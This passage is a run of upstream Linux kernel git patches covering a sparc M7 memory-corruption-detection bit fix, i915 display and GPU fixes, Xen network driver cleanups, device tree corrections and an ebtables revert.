pci_slot = pci_create_slot(pbus, slot_num[0], name, NULL); + + if (IS_ERR(pci_slot)) + pr_err("PCI: pci_create_slot returned %ld.\n", + PTR_ERR(pci_slot)); + } + + list_for_each_entry(bus, &pbus->children, node) + pcie_bus_slot_names(bus); +} + static void pci_bus_slot_names(struct device_node *node, struct pci_bus *bus) { const struct pci_slot_names { @@ -1053,18 +1085,29 @@ static int __init of_pci_slot_init(void) while ((pbus = pci_find_next_bus(pbus)) != NULL) { struct device_node *node; + struct pci_dev *pdev; + + pdev = list_first_entry(&pbus->devices, struct pci_dev, + bus_list); - if (pbus->self) { - /* PCI->PCI bridge */ - node = pbus->self->dev.of_node; + if (pdev && pci_is_pcie(pdev)) { + pcie_bus_slot_names(pbus); } else { - struct pci_pbm_info *pbm = pbus->sysdata; - /* Host PCI controller */ - node = pbm->op->dev.of_node; - } + if (pbus->self) { + + /* PCI->PCI bridge */ + node = pbus->self->dev.of_node; + + } else { + struct pci_pbm_info *pbm = pbus->sysdata; - pci_bus_slot_names(node, pbus); + /* Host PCI controller */ + node = pbm->op->dev.of_node; + } + + pci_bus_slot_names(node, pbus); + } } return 0; From 494e5b6faeda1d1e830a13e10b3c7bc323f35d97 Mon Sep 17 00:00:00 2001 From: Khalid Aziz Date: Wed, 27 May 2015 10:00:46 -0600 Subject: [PATCH 548/872] sparc: Resolve conflict between sparc v9 and M7 on usage of bit 9 of TTE sparc: Resolve conflict between sparc v9 and M7 on usage of bit 9 of TTE Bit 9 of TTE is CV (Cacheable in V-cache) on sparc v9 processor while the same bit 9 is MCDE (Memory Corruption Detection Enable) on M7 processor. This creates a conflicting usage of the same bit. Kernel sets TTE.cv bit on all pages for sun4v architecture which works well for sparc v9 but enables memory corruption detection on M7 processor which is not the intent. This patch adds code to determine if kernel is running on M7 processor and takes steps to not enable memory corruption detection in TTE erroneously. Signed-off-by: Khalid Aziz Signed-off-by: David S. Miller --- arch/sparc/include/asm/pgtable_64.h | 22 ++++++++- arch/sparc/include/asm/trap_block.h | 2 + arch/sparc/kernel/entry.h | 2 + arch/sparc/kernel/setup_64.c | 21 ++++++++ arch/sparc/kernel/vmlinux.lds.S | 5 ++ arch/sparc/mm/init_64.c | 74 +++++++++++++++++++++-------- 6 files changed, 104 insertions(+), 22 deletions(-) diff --git a/arch/sparc/include/asm/pgtable_64.h b/arch/sparc/include/asm/pgtable_64.h index dc165ebdf05a..2a52c91d2c8a 100644 --- a/arch/sparc/include/asm/pgtable_64.h +++ b/arch/sparc/include/asm/pgtable_64.h @@ -308,12 +308,26 @@ static inline pte_t pte_modify(pte_t pte, pgprot_t prot) " sllx %1, 32, %1\n" " or %0, %1, %0\n" " .previous\n" + " .section .sun_m7_2insn_patch, \"ax\"\n" + " .word 661b\n" + " sethi %%uhi(%4), %1\n" + " sethi %%hi(%4), %0\n" + " .word 662b\n" + " or %1, %%ulo(%4), %1\n" + " or %0, %%lo(%4), %0\n" + " .word 663b\n" + " sllx %1, 32, %1\n" + " or %0, %1, %0\n" + " .previous\n" : "=r" (mask), "=r" (tmp) : "i" (_PAGE_PADDR_4U | _PAGE_MODIFIED_4U | _PAGE_ACCESSED_4U | _PAGE_CP_4U | _PAGE_CV_4U | _PAGE_E_4U | _PAGE_SPECIAL | _PAGE_PMD_HUGE | _PAGE_SZALL_4U), "i" (_PAGE_PADDR_4V | _PAGE_MODIFIED_4V | _PAGE_ACCESSED_4V | _PAGE_CP_4V | _PAGE_CV_4V | _PAGE_E_4V | + _PAGE_SPECIAL | _PAGE_PMD_HUGE | _PAGE_SZALL_4V), + "i" (_PAGE_PADDR_4V | _PAGE_MODIFIED_4V | _PAGE_ACCESSED_4V | + _PAGE_CP_4V | _PAGE_E_4V | _PAGE_SPECIAL | _PAGE_PMD_HUGE | _PAGE_SZALL_4V)); return __pte((pte_val(pte) & mask) | (pgprot_val(prot) & ~mask)); @@ -342,9 +356,15 @@ static inline pgprot_t pgprot_noncached(pgprot_t prot) " andn %0, %4, %0\n" " or %0, %5, %0\n" " .previous\n" + " .section .sun_m7_2insn_patch, \"ax\"\n" + " .word 661b\n" + " andn %0, %6, %0\n" + " or %0, %5, %0\n" + " .previous\n" : "=r" (val) : "0" (val), "i" (_PAGE_CP_4U | _PAGE_CV_4U), "i" (_PAGE_E_4U), - "i" (_PAGE_CP_4V | _PAGE_CV_4V), "i" (_PAGE_E_4V)); + "i" (_PAGE_CP_4V | _PAGE_CV_4V), "i" (_PAGE_E_4V), + "i" (_PAGE_CP_4V)); return __pgprot(val); } diff --git a/arch/sparc/include/asm/trap_block.h b/arch/sparc/include/asm/trap_block.h index 6fd4436d32f0..ec9c04de3664 100644 --- a/arch/sparc/include/asm/trap_block.h +++ b/arch/sparc/include/asm/trap_block.h @@ -79,6 +79,8 @@ struct sun4v_2insn_patch_entry { }; extern struct sun4v_2insn_patch_entry __sun4v_2insn_patch, __sun4v_2insn_patch_end; +extern struct sun4v_2insn_patch_entry __sun_m7_2insn_patch, + __sun_m7_2insn_patch_end; #endif /* !(__ASSEMBLY__) */ diff --git a/arch/sparc/kernel/entry.h b/arch/sparc/kernel/entry.h index 07cc49e541f4..0f679421b468 100644 --- a/arch/sparc/kernel/entry.h +++ b/arch/sparc/kernel/entry.h @@ -69,6 +69,8 @@ void sun4v_patch_1insn_range(struct sun4v_1insn_patch_entry *, struct sun4v_1insn_patch_entry *); void sun4v_patch_2insn_range(struct sun4v_2insn_patch_entry *, struct sun4v_2insn_patch_entry *); +void sun_m7_patch_2insn_range(struct sun4v_2insn_patch_entry *, + struct sun4v_2insn_patch_entry *); extern unsigned int dcache_parity_tl1_occurred; extern unsigned int icache_parity_tl1_occurred; diff --git a/arch/sparc/kernel/setup_64.c b/arch/sparc/kernel/setup_64.c index c38d19fc27ba..f7b261749383 100644 --- a/arch/sparc/kernel/setup_64.c +++ b/arch/sparc/kernel/setup_64.c @@ -255,6 +255,24 @@ void sun4v_patch_2insn_range(struct sun4v_2insn_patch_entry *start, } } +void sun_m7_patch_2insn_range(struct sun4v_2insn_patch_entry *start, + struct sun4v_2insn_patch_entry *end) +{ + while (start < end) { + unsigned long addr = start->addr; + + *(unsigned int *) (addr + 0) = start->insns[0]; + wmb(); + __asm__ __volatile__("flush %0" : : "r" (addr + 0)); + + *(unsigned int *) (addr + 4) = start->insns[1]; + wmb(); + __asm__ __volatile__("flush %0" : : "r" (addr + 4)); + + start++; + } +} + static void __init sun4v_patch(void) { extern void sun4v_hvapi_init(void); @@ -267,6 +285,9 @@ static void __init sun4v_patch(void) sun4v_patch_2insn_range(&__sun4v_2insn_patch, &__sun4v_2insn_patch_end); + if (sun4v_chip_type == SUN4V_CHIP_SPARC_M7) + sun_m7_patch_2insn_range(&__sun_m7_2insn_patch, + &__sun_m7_2insn_patch_end); sun4v_hvapi_init(); } diff --git a/arch/sparc/kernel/vmlinux.lds.S b/arch/sparc/kernel/vmlinux.lds.S index 09243057cb0b..f1a2f688b28a 100644 --- a/arch/sparc/kernel/vmlinux.lds.S +++ b/arch/sparc/kernel/vmlinux.lds.S @@ -138,6 +138,11 @@ SECTIONS *(.pause_3insn_patch) __pause_3insn_patch_end = .; } + .sun_m7_2insn_patch : { + __sun_m7_2insn_patch = .; + *(.sun_m7_2insn_patch) + __sun_m7_2insn_patch_end = .; + } PERCPU_SECTION(SMP_CACHE_BYTES) . = ALIGN(PAGE_SIZE); diff --git a/arch/sparc/mm/init_64.c b/arch/sparc/mm/init_64.c index 4ca0d6ba5ec8..559cb744112c 100644 --- a/arch/sparc/mm/init_64.c +++ b/arch/sparc/mm/init_64.c @@ -54,6 +54,7 @@ #include "init_64.h" unsigned long kern_linear_pte_xor[4] __read_mostly; +static unsigned long page_cache4v_flag; /* A bitmap, two bits for every 256MB of physical memory. These two * bits determine what page size we use for kernel linear @@ -1909,11 +1910,24 @@ static void __init sun4u_linear_pte_xor_finalize(void) static void __init sun4v_linear_pte_xor_finalize(void) { + unsigned long pagecv_flag; + + /* Bit 9 of TTE is no longer CV bit on M7 processor and it instead + * enables MCD error. Do not set bit 9 on M7 processor. + */ + switch (sun4v_chip_type) { + case SUN4V_CHIP_SPARC_M7: + pagecv_flag = 0x00; + break; + default: + pagecv_flag = _PAGE_CV_4V; + break; + } #ifndef CONFIG_DEBUG_PAGEALLOC if (cpu_pgsz_mask & HV_PGSZ_MASK_256MB) { kern_linear_pte_xor[1] = (_PAGE_VALID | _PAGE_SZ256MB_4V) ^ PAGE_OFFSET; - kern_linear_pte_xor[1] |= (_PAGE_CP_4V | _PAGE_CV_4V | + kern_linear_pte_xor[1] |= (_PAGE_CP_4V | pagecv_flag | _PAGE_P_4V | _PAGE_W_4V); } else { kern_linear_pte_xor[1] = kern_linear_pte_xor[0]; @@ -1922,7 +1936,7 @@ static void __init sun4v_linear_pte_xor_finalize(void) if (cpu_pgsz_mask & HV_PGSZ_MASK_2GB) { kern_linear_pte_xor[2] = (_PAGE_VALID | _PAGE_SZ2GB_4V) ^ PAGE_OFFSET; - kern_linear_pte_xor[2] |= (_PAGE_CP_4V | _PAGE_CV_4V | + kern_linear_pte_xor[2] |= (_PAGE_CP_4V | pagecv_flag | _PAGE_P_4V | _PAGE_W_4V); } else { kern_linear_pte_xor[2] = kern_linear_pte_xor[1]; @@ -1931,7 +1945,7 @@ static void __init sun4v_linear_pte_xor_finalize(void) if (cpu_pgsz_mask & HV_PGSZ_MASK_16GB) { kern_linear_pte_xor[3] = (_PAGE_VALID | _PAGE_SZ16GB_4V) ^ PAGE_OFFSET; - kern_linear_pte_xor[3] |= (_PAGE_CP_4V | _PAGE_CV_4V | + kern_linear_pte_xor[3] |= (_PAGE_CP_4V | pagecv_flag | _PAGE_P_4V | _PAGE_W_4V); } else { kern_linear_pte_xor[3] = kern_linear_pte_xor[2]; @@ -1958,6 +1972,13 @@ static phys_addr_t __init available_memory(void) return available; } +#define _PAGE_CACHE_4U (_PAGE_CP_4U | _PAGE_CV_4U) +#define _PAGE_CACHE_4V (_PAGE_CP_4V | _PAGE_CV_4V) +#define __DIRTY_BITS_4U (_PAGE_MODIFIED_4U | _PAGE_WRITE_4U | _PAGE_W_4U) +#define __DIRTY_BITS_4V (_PAGE_MODIFIED_4V | _PAGE_WRITE_4V | _PAGE_W_4V) +#define __ACCESS_BITS_4U (_PAGE_ACCESSED_4U | _PAGE_READ_4U | _PAGE_R) +#define __ACCESS_BITS_4V (_PAGE_ACCESSED_4V | _PAGE_READ_4V | _PAGE_R) + /* We need to exclude reserved regions. This exclusion will include * vmlinux and initrd. To be more precise the initrd size could be used to * compute a new lower limit because it is freed later during initialization. @@ -2034,6 +2055,25 @@ void __init paging_init(void) memset(swapper_4m_tsb, 0x40, sizeof(swapper_4m_tsb)); #endif + /* TTE.cv bit on sparc v9 occupies the same position as TTE.mcde + * bit on M7 processor. This is a conflicting usage of the same + * bit. Enabling TTE.cv on M7 would turn on Memory Corruption + * Detection error on all pages and this will lead to problems + * later. Kernel does not run with MCD enabled and hence rest + * of the required steps to fully configure memory corruption + * detection are not taken. We need to ensure TTE.mcde is not + * set on M7 processor. Compute the value of cacheability + * flag for use later taking this into consideration. + */ + switch (sun4v_chip_type) { + case SUN4V_CHIP_SPARC_M7: + page_cache4v_flag = _PAGE_CP_4V; + break; + default: + page_cache4v_flag = _PAGE_CACHE_4V; + break; + } + if (tlb_type == hypervisor) sun4v_pgprot_init(); else @@ -2274,13 +2314,6 @@ void free_initrd_mem(unsigned long start, unsigned long end) } #endif -#define _PAGE_CACHE_4U (_PAGE_CP_4U | _PAGE_CV_4U) -#define _PAGE_CACHE_4V (_PAGE_CP_4V | _PAGE_CV_4V) -#define __DIRTY_BITS_4U (_PAGE_MODIFIED_4U | _PAGE_WRITE_4U | _PAGE_W_4U) -#define __DIRTY_BITS_4V (_PAGE_MODIFIED_4V | _PAGE_WRITE_4V | _PAGE_W_4V) -#define __ACCESS_BITS_4U (_PAGE_ACCESSED_4U | _PAGE_READ_4U | _PAGE_R) -#define __ACCESS_BITS_4V (_PAGE_ACCESSED_4V | _PAGE_READ_4V | _PAGE_R) - pgprot_t PAGE_KERNEL __read_mostly; EXPORT_SYMBOL(PAGE_KERNEL); @@ -2312,8 +2345,7 @@ int __meminit vmemmap_populate(unsigned long vstart, unsigned long vend, _PAGE_P_4U | _PAGE_W_4U); if (tlb_type == hypervisor) pte_base = (_PAGE_VALID | _PAGE_SZ4MB_4V | - _PAGE_CP_4V | _PAGE_CV_4V | - _PAGE_P_4V | _PAGE_W_4V); + page_cache4v_flag | _PAGE_P_4V | _PAGE_W_4V); pte_base |= _PAGE_PMD_HUGE; @@ -2450,14 +2482,14 @@ static void __init sun4v_pgprot_init(void) int i; PAGE_KERNEL = __pgprot (_PAGE_PRESENT_4V | _PAGE_VALID | - _PAGE_CACHE_4V | _PAGE_P_4V | + page_cache4v_flag | _PAGE_P_4V | __ACCESS_BITS_4V | __DIRTY_BITS_4V | _PAGE_EXEC_4V); PAGE_KERNEL_LOCKED = PAGE_KERNEL; _PAGE_IE = _PAGE_IE_4V; _PAGE_E = _PAGE_E_4V; - _PAGE_CACHE = _PAGE_CACHE_4V; + _PAGE_CACHE = page_cache4v_flag; #ifdef CONFIG_DEBUG_PAGEALLOC kern_linear_pte_xor[0] = _PAGE_VALID ^ PAGE_OFFSET; @@ -2465,8 +2497,8 @@ static void __init sun4v_pgprot_init(void) kern_linear_pte_xor[0] = (_PAGE_VALID | _PAGE_SZ4MB_4V) ^ PAGE_OFFSET; #endif - kern_linear_pte_xor[0] |= (_PAGE_CP_4V | _PAGE_CV_4V | - _PAGE_P_4V | _PAGE_W_4V); + kern_linear_pte_xor[0] |= (page_cache4v_flag | _PAGE_P_4V | + _PAGE_W_4V); for (i = 1; i < 4; i++) kern_linear_pte_xor[i] = kern_linear_pte_xor[0]; @@ -2479,12 +2511,12 @@ static void __init sun4v_pgprot_init(void) _PAGE_SZ4MB_4V | _PAGE_SZ512K_4V | _PAGE_SZ64K_4V | _PAGE_SZ8K_4V); - page_none = _PAGE_PRESENT_4V | _PAGE_ACCESSED_4V | _PAGE_CACHE_4V; - page_shared = (_PAGE_VALID | _PAGE_PRESENT_4V | _PAGE_CACHE_4V | + page_none = _PAGE_PRESENT_4V | _PAGE_ACCESSED_4V | page_cache4v_flag; + page_shared = (_PAGE_VALID | _PAGE_PRESENT_4V | page_cache4v_flag | __ACCESS_BITS_4V | _PAGE_WRITE_4V | _PAGE_EXEC_4V); - page_copy = (_PAGE_VALID | _PAGE_PRESENT_4V | _PAGE_CACHE_4V | + page_copy = (_PAGE_VALID | _PAGE_PRESENT_4V | page_cache4v_flag | __ACCESS_BITS_4V | _PAGE_EXEC_4V); - page_readonly = (_PAGE_VALID | _PAGE_PRESENT_4V | _PAGE_CACHE_4V | + page_readonly = (_PAGE_VALID | _PAGE_PRESENT_4V | page_cache4v_flag | __ACCESS_BITS_4V | _PAGE_EXEC_4V); page_exec_bit = _PAGE_EXEC_4V; @@ -2542,7 +2574,7 @@ static unsigned long kern_large_tte(unsigned long paddr) _PAGE_EXEC_4U | _PAGE_L_4U | _PAGE_W_4U); if (tlb_type == hypervisor) val = (_PAGE_VALID | _PAGE_SZ4MB_4V | - _PAGE_CP_4V | _PAGE_CV_4V | _PAGE_P_4V | + page_cache4v_flag | _PAGE_P_4V | _PAGE_EXEC_4V | _PAGE_W_4V); return val | paddr; From 493be55ac3d81f9c32832237288eb397a9993d5d Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 10:28:37 +0530 Subject: [PATCH 549/872] xen-netfront: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e, func, da; @@ -init_timer (&e); +setup_timer (&e, func, da); -e.data = da; -e.function = func; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/net/xen-netfront.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/net/xen-netfront.c b/drivers/net/xen-netfront.c index 3f45afd4382e..10a087a0ba35 100644 --- a/drivers/net/xen-netfront.c +++ b/drivers/net/xen-netfront.c @@ -1560,9 +1560,8 @@ static int xennet_init_queue(struct netfront_queue *queue) spin_lock_init(&queue->tx_lock); spin_lock_init(&queue->rx_lock); - init_timer(&queue->rx_refill_timer); - queue->rx_refill_timer.data = (unsigned long)queue; - queue->rx_refill_timer.function = rx_refill_timeout; + setup_timer(&queue->rx_refill_timer, rx_refill_timeout, + (unsigned long)queue); snprintf(queue->name, sizeof(queue->name), "%s-q%u", queue->info->netdev->name, queue->id); From e058c945e03a629c99606452a6931f632dd28903 Mon Sep 17 00:00:00 2001 From: Jim Bride Date: Wed, 27 May 2015 10:21:48 -0700 Subject: [PATCH 550/872] drm/i915/hsw: Fix workaround for server AUX channel clock divisor According to the HSW b-spec we need to try clock divisors of 63 and 72, each 3 or more times, when attempting DP AUX channel communication on a server chipset. This actually wasn't happening due to a short-circuit that only checked the DP_AUX_CH_CTL_DONE bit in status rather than checking that the operation was done and that DP_AUX_CH_CTL_TIME_OUT_ERROR was not set. [v2] Implemented alternate solution suggested by Jani Nikula. Cc: stable@vger.kernel.org Signed-off-by: Jim Bride Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_dp.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/gpu/drm/i915/intel_dp.c b/drivers/gpu/drm/i915/intel_dp.c index f27346e907b1..d714a4b5711e 100644 --- a/drivers/gpu/drm/i915/intel_dp.c +++ b/drivers/gpu/drm/i915/intel_dp.c @@ -880,10 +880,8 @@ intel_dp_aux_ch(struct intel_dp *intel_dp, DP_AUX_CH_CTL_RECEIVE_ERROR)) continue; if (status & DP_AUX_CH_CTL_DONE) - break; + goto done; } - if (status & DP_AUX_CH_CTL_DONE) - break; } if ((status & DP_AUX_CH_CTL_DONE) == 0) { @@ -892,6 +890,7 @@ intel_dp_aux_ch(struct intel_dp *intel_dp, goto out; } +done: /* Check for timeout or receive error. * Timeouts occur when the sink is not connected */ From 0aedb1626566efd72b369c01992ee7413c82a0c5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ville=20Syrj=C3=A4l=C3=A4?= Date: Thu, 28 May 2015 18:32:36 +0300 Subject: [PATCH 551/872] drm/i915: Don't skip request retirement if the active list is empty MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apparently we can have requests even if though the active list is empty, so do the request retirement regardless of whether there's anything on the active list. The way it happened here is that during suspend intel_ring_idle() notices the olr hanging around and then proceeds to get rid of it by adding a request. However since there was nothing on the active lists i915_gem_retire_requests() didn't clean those up, and so the idle work never runs, and we leave the GPU "busy" during suspend resulting in a WARN later. Signed-off-by: Ville Syrjälä Reviewed-by: Chris Wilson Cc: stable@vger.kernel.org Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_gem.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c index 53394f998a1f..851b585987f9 100644 --- a/drivers/gpu/drm/i915/i915_gem.c +++ b/drivers/gpu/drm/i915/i915_gem.c @@ -2656,9 +2656,6 @@ void i915_gem_reset(struct drm_device *dev) void i915_gem_retire_requests_ring(struct intel_engine_cs *ring) { - if (list_empty(&ring->request_list)) - return; - WARN_ON(i915_verify_lists(ring->dev)); /* Retire requests first as we use it above for the early return. From 9dd6f1c166bc6e7b582f6203f2dc023ec65e3ed5 Mon Sep 17 00:00:00 2001 From: Jonas Gorski Date: Mon, 25 May 2015 19:53:54 +0200 Subject: [PATCH 552/872] MIPS: ralink: Fix clearing the illegal access interrupt Due to a typo the illegal access interrupt is never cleared in by the interupt handler, causing an effective deadlock on the first illegal access. This was broken since the code was introduced in 5433acd81e87 ("MIPS: ralink: add illegal access driver"), but only exposed when the Kconfig symbol was added, thus enabling the code. Cc: [3.18+] Fixes: a7b7aad383c ("MIPS: ralink: add missing symbol for RALINK_ILL_ACC") Signed-off-by: Jonas Gorski Cc: linux-mips@linux-mips.org Cc: John Crispin Patchwork: https://patchwork.linux-mips.org/patch/10172/ Signed-off-by: Ralf Baechle --- arch/mips/ralink/ill_acc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/ralink/ill_acc.c b/arch/mips/ralink/ill_acc.c index e20b02e3ae28..e10d10b9e82a 100644 --- a/arch/mips/ralink/ill_acc.c +++ b/arch/mips/ralink/ill_acc.c @@ -41,7 +41,7 @@ static irqreturn_t ill_acc_irq_handler(int irq, void *_priv) addr, (type >> ILL_ACC_OFF_S) & ILL_ACC_OFF_M, type & ILL_ACC_LEN_M); - rt_memc_w32(REG_ILL_ACC_TYPE, REG_ILL_ACC_TYPE); + rt_memc_w32(ILL_INT_STATUS, REG_ILL_ACC_TYPE); return IRQ_HANDLED; } From 692ef3ee36833b6098a352c079d3cea8fc6ed3ef Mon Sep 17 00:00:00 2001 From: Yingjoe Chen Date: Fri, 15 May 2015 23:13:16 +0800 Subject: [PATCH 553/872] arm64: dts: mt8173-evb: fix model name Model name in mt8173-evb.dts doesn't follow dts convention (it should be human readable model name). Fix it. Fixes: b3a372484157 ("arm64: dts: Add mediatek MT8173 SoC and evaluation board dts and Makefile") Cc: # v4.0+ Signed-off-by: Yingjoe Chen Signed-off-by: Matthias Brugger --- arch/arm64/boot/dts/mediatek/mt8173-evb.dts | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts index 43d54017b779..d0ab012fa379 100644 --- a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts +++ b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts @@ -16,7 +16,8 @@ #include "mt8173.dtsi" / { - model = "mediatek,mt8173-evb"; + model = "MediaTek MT8173 evaluation board"; + compatible = "mediatek,mt8173-evb", "mediatek,mt8173"; aliases { serial0 = &uart0; From 8a7b19d8b542b87bccc3eaaf81dcc90a5ca48aea Mon Sep 17 00:00:00 2001 From: Mikko Rapeli Date: Sat, 30 May 2015 17:39:25 +0200 Subject: [PATCH 554/872] include/uapi/linux/virtio_balloon.h: include linux/virtio_types.h MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes userspace compilation error: error: unknown type name ‘__virtio16’ __virtio16 tag; Signed-off-by: Mikko Rapeli Signed-off-by: Michael S. Tsirkin --- include/uapi/linux/virtio_balloon.h | 1 + 1 file changed, 1 insertion(+) diff --git a/include/uapi/linux/virtio_balloon.h b/include/uapi/linux/virtio_balloon.h index 984169a819ee..d7f1cbc3766c 100644 --- a/include/uapi/linux/virtio_balloon.h +++ b/include/uapi/linux/virtio_balloon.h @@ -26,6 +26,7 @@ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include +#include #include #include From b33558c906bf330336b16dc4598fecee66e48a57 Mon Sep 17 00:00:00 2001 From: Tero Kristo Date: Mon, 1 Jun 2015 18:30:27 +0300 Subject: [PATCH 555/872] ARM: dts: AM35xx: fix system control module clocks New system control module layout for omap3 overlooked parts of the am35xx configuration. Basically the am35xx clocks were not converted to use the changed offsets, which caused weird boot warnings. The errors were not fatal so far, so they were not caught earlier. Fixed by applying the proper offsets for the AM35xx scm clocks. Fixes: b8845074cf ("ARM: dts: omap3: add minimal l4 bus layout with...") Signed-off-by: Tero Kristo Reported-by: Jeroen Hofstee Cc: Paul Walmsley Tested-by: Jeroen Hofstee Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am35xx-clocks.dtsi | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/arch/arm/boot/dts/am35xx-clocks.dtsi b/arch/arm/boot/dts/am35xx-clocks.dtsi index 518b8fde88b0..18cc826e9db5 100644 --- a/arch/arm/boot/dts/am35xx-clocks.dtsi +++ b/arch/arm/boot/dts/am35xx-clocks.dtsi @@ -12,7 +12,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&ipss_ick>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <1>; }; @@ -20,7 +20,7 @@ #clock-cells = <0>; compatible = "ti,gate-clock"; clocks = <&rmii_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <9>; }; @@ -28,7 +28,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&ipss_ick>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <2>; }; @@ -36,7 +36,7 @@ #clock-cells = <0>; compatible = "ti,gate-clock"; clocks = <&pclk_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <10>; }; @@ -44,7 +44,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&ipss_ick>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <0>; }; @@ -52,7 +52,7 @@ #clock-cells = <0>; compatible = "ti,gate-clock"; clocks = <&sys_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <8>; }; @@ -60,7 +60,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&sys_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <3>; }; }; From d26e2c9ffa385dd1b646f43c1397ba12af9ed431 Mon Sep 17 00:00:00 2001 From: Bernhard Thaler Date: Thu, 28 May 2015 10:26:18 +0200 Subject: [PATCH 556/872] Revert "netfilter: ensure number of counters is >0 in do_replace()" This partially reverts commit 1086bbe97a07 ("netfilter: ensure number of counters is >0 in do_replace()") in net/bridge/netfilter/ebtables.c. Setting rules with ebtables does not work any more with 1086bbe97a07 place. There is an error message and no rules set in the end. e.g. ~# ebtables -t nat -A POSTROUTING --src 12:34:56:78:9a:bc -j DROP Unable to update the kernel. Two possible causes: 1. Multiple ebtables programs were executing simultaneously. The ebtables userspace tool doesn't by default support multiple ebtables programs running Reverting the ebtables part of 1086bbe97a07 makes this work again. Signed-off-by: Bernhard Thaler Signed-off-by: Pablo Neira Ayuso --- net/bridge/netfilter/ebtables.c | 4 ---- 1 file changed, 4 deletions(-) diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c index 24c7c96bf5f8..91180a7fc943 100644 --- a/net/bridge/netfilter/ebtables.c +++ b/net/bridge/netfilter/ebtables.c @@ -1117,8 +1117,6 @@ static int do_replace(struct net *net, const void __user *user, return -ENOMEM; if (tmp.num_counters >= INT_MAX / sizeof(struct ebt_counter)) return -ENOMEM; - if (tmp.num_counters == 0) - return -EINVAL; tmp.name[sizeof(tmp.name) - 1] = 0; @@ -2161,8 +2159,6 @@ static int compat_copy_ebt_replace_from_user(struct ebt_replace *repl, return -ENOMEM; if (tmp.num_counters >= INT_MAX / sizeof(struct ebt_counter)) return -ENOMEM; - if (tmp.num_counters == 0) - return -EINVAL; memcpy(repl, &tmp, offsetof(struct ebt_replace, hook_entry)); From dc5e7a811d3e57f2b10a4c4c90b175ce498a097d Mon Sep 17 00:00:00 2001 From: Ian Campbell Date: Mon, 1 Jun 2015 11:30:04 +0100 Subject: [PATCH 557/872] xen: netback: fix printf format string warning MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit drivers/net/xen-netback/netback.c: In function ‘xenvif_tx_build_gops’: drivers/net/xen-netback/netback.c:1253:8: warning: format ‘%lu’ expects argument of type ‘long unsigned int’, but argument 5 has type ‘int’ [-Wformat=] (txreq.offset&~PAGE_MASK) + txreq.size); ^ PAGE_MASK's type can vary by arch, so a cast is needed. Signed-off-by: Ian Campbell ---- v2: Cast to unsigned long, since PAGE_MASK can vary by arch. Acked-by: Wei Liu Signed-off-by: David S. Miller --- drivers/net/xen-netback/netback.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c index 4de46aa61d95..0d2594395ffb 100644 --- a/drivers/net/xen-netback/netback.c +++ b/drivers/net/xen-netback/netback.c @@ -1250,7 +1250,7 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue, netdev_err(queue->vif->dev, "txreq.offset: %x, size: %u, end: %lu\n", txreq.offset, txreq.size, - (txreq.offset&~PAGE_MASK) + txreq.size); + (unsigned long)(txreq.offset&~PAGE_MASK) + txreq.size); xenvif_fatal_tx_err(queue->vif); break; } From 31a418986a5852034d520a5bab546821ff1ccf3d Mon Sep 17 00:00:00 2001 From: Ian Campbell Date: Mon, 1 Jun 2015 11:30:24 +0100 Subject: [PATCH 558/872] xen: netback: read hotplug script once at start of day. When we come to tear things down in netback_remove() and generate the uevent it is possible that the xenstore directory has already been removed (details below). In such cases netback_uevent() won't be able to read the hotplug script and will write a xenstore error node. A recent change to the hypervisor exposed this race such that we now sometimes lose it (where apparently we didn't ever before). Instead read the hotplug script configuration during setup and use it for the lifetime of the backend device. The apparently more obvious fix of moving the transition to state=Closed in netback_remove() to after the uevent does not work because it is possible that we are already in state=Closed (in reaction to the guest having disconnected as it shutdown). Being already in Closed means the toolstack is at liberty to start tearing down the xenstore directories. In principal it might be possible to arrange to unregister the device sooner (e.g on transition to Closing) such that xenstore would still be there but this state machine is fragile and prone to anger... A modern Xen system only relies on the hotplug uevent for driver domains, when the backend is in the same domain as the toolstack it will run the necessary setup/teardown directly in the correct sequence wrt xenstore changes. Signed-off-by: Ian Campbell Acked-by: Wei Liu Signed-off-by: David S. Miller --- drivers/net/xen-netback/xenbus.c | 33 